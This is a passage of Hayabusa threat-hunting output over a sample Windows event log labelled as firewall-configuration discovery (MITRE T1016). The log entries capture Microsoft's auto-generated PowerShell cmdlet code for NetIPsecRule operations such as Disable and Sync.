[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_v",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"alues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) 
$__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) 
$__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if 
(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 